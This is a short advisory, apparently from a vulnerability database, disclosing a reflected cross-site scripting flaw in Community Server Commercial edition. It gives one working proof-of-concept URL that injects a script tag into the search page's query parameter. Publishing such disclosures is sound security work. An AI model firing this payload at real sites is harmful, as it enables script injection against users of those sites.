Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:16043

HistoryFeb 13, 2007 - 12:00 a.m.

XSS in communityserver !

2007-02-1300:00:00

vulners.com

23

hey guys … check out this new xss i just found ;P

Vulnerable : communityserver Commercial edition
web : http://communityserver.org/

XSS :

http://localhost/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3e&o=Relevance

Discovered By BLacK ZeRo
[email protected]

Best regards ,